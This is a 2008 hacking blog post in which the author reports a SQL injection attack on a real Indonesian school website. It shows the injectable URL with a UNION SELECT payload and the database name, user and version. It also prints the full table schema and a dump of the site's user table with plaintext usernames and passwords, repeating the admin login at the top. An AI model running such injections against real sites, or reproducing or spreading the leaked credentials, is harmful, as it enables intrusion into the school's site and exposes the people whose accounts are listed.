viperfx07 blog (hack + crack + web + app)

viperfx07 is here to blog about hacking, cracking, website, application, android, and many more.

Wednesday, September 24, 2008

[SQLi] http://www.smanu1-gsk.sch.id

2:43 PM Posted by viperfx07 No comments
username:passwd = ADMIN:105452



Website: http://www.smanu1-gsk.sch.id
Tool: schemafuzz.py (wow, it's a great tool. I should use it instead of blindext.py)


[+] URL:http://www.smanu1-gsk.sch.id/?grp_=galery_&id_=-24%20union%20select%201,darkc0de,3,4,5,6
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: t84036_smanu
User: t84036_smanu@localhost
Version: 5.0.32-Debian_7etch6
[-] Done



[Database]: t84036_smanu
[Table: Columns]
[0]agenda_: id_,judul_item_,item_,tanggal_
[1]alumni_: id_,nama_,tempat_lahir_,tanggal_lahir_,jurusan_,angkatan_,alamat_rumah_,telp_rumah_,perusahaan_,alamat_perusahaan_,telp_perusahaan_,jabatan_,email_
[2]artikel_: id_,judul_menu_,judul_item_,link_,aktif_,tanggal_aktif_
[3]berita_: id_,judul_item_,gambar_,sinopsis_,item_,pembuat_,tanggal_buat_,aktif_,tanggal_aktif_
[4]chat_: id_,nama_,email_,pesan_
[5]dual: dum
[6]fasilitas_: id_,judul_menu_,judul_item_,pembuat_,tanggal_buat_,item_,aktif_,tanggal_aktif_
[7]galery_: id_,judul_item_,tanggal_,link_,pembuat_,komentar_
[8]hak_akses_: pengguna_,site_map_
[9]jurusan_: id_,nama_,tanggal_mulai_,tanggal_akhir_
[10]pengajar_: id_,judul_menu_,judul_item_,pembuat_,tanggal_buat_,item_,aktif_,tanggal_aktif_
[11]pengguna_: id_,nama_,nama_lengkap_,kunci_,level_
[12]pengumuman_: id_,judul_menu_,judul_item_,nama_panggil_,nama_sukses_,nama_gagal_,keterangan_1,keterangan_2,keterangan_3,full_,contoh_,aktif_,tanggal_aktif_
[13]pengumuman_det_: id_,id_grp_,nomor_,keterangan_1,keterangan_2,keterangan_3
[14]profile_: id_,judul_menu_,judul_item_,pembuat_,tanggal_buat_,item_,aktif_,tanggal_aktif_
[15]siswa_: id_,judul_menu_,judul_item_,pembuat_,tanggal_buat_,item_,aktif_,tanggal_aktif_
[16]site_map_: id_

[-] [11:33:23]
[-] Total URL Requests 107
[-] Done


[+] URL:http://www.smanu1-gsk.sch.id/?grp_=galery_&id_=-24%20union%20select%201,darkc0de,3,4,5,6
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: t84036_smanu
User: t84036_smanu@localhost
Version: 5.0.32-Debian_7etch6
[+] Dumping data from database "t84036_smanu" Table "pengguna_"
[+] Column(s) ['id_', 'nama_', 'kunci_', 'level_']
[+] 11:35:21
[+] Number of Rows: 6

[0] 1:ADMIN:105452:0:
[1] 3:AAN:tyasku:1:
[2] 4:KHULUK:111000:0:
[3] 9:INFO:info:1:
[4] 10:BK:bksmanusa:1:
[5] 8:MK_KHULUK:111000:0:

[-] [11:35:24]
[-] Total URL Requests 7
[-] Done

0 comments:

Post a Comment